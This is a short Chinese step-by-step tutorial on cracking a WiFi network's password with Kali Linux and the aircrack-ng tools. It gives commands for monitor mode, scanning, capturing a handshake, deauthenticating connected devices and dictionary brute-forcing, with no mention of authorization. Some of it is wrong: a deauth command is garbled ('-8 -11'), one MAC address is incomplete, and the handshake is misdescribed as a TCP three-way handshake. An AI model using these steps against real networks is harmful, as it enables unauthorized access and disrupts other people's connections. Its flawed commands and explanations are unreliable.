使用 Kali Linux 爆破 WiFi 密码

所需工具：Kali Linux 系统    无线网卡(免驱动)

需要用到的命令：

airmon-ng #查看网卡是否支持监听模式

airmon-ng start 网卡名 #开启网卡监听

airodump-ng 网卡名 #扫描附近WiFi

aireplay-ng --bssid WiFi的BSSID -c 信道频率 -w 抓包存储的路径 网卡名 #抓取握手包

aireplay-ng -0 0 -a WiFi的BSSID -c 连接到WiFi的mac地址 网卡名 #攻击已连接设备，使其掉线

aircrack-ng -w 密码字典 握手包路径 #字典爆破

步骤1：

插入无线网卡，连接到Kali Linux

输入ifconfig，查看是否有网卡信息

步骤2：

         输入 airmon-ng start wlan0 开启监听模式

注意：开启后 网卡名字变成了 wlan0mon

步骤3：

         输入 airodump-ng wlan0mon 扫描附近WiFi

步骤4：

         开始抓包

              输入 airodump-ng –bssid 94:63:72:81:ED:CF -c 11 -w hack wlan0mon

注意：若抓不到，可以攻击已经连接的设备使其掉线，设备会再自动连接，并在这个自动连接过程中会进行三次握手，会发出TCP包（里面包含加密的密码数据），我方伪装成WiFi热点去盗窃该数据包。我方盗窃后可用字典穷举法暴力破解加密的WiFi密码。（数据包里面的密码是哈希值加密的，哈希值加密只能正向）

输入 aireplay-ng -8 -11 -a 94:63:72:81:ED:CF -c 90:78:63:38:6E wlan0mon

注意：密码字典可以到网上下载，也可以自己生成

步骤5：

         输入 aircrack-ng -w /root/pass.txt /root/hack-01.cap 开始暴力破解

密码破解成功！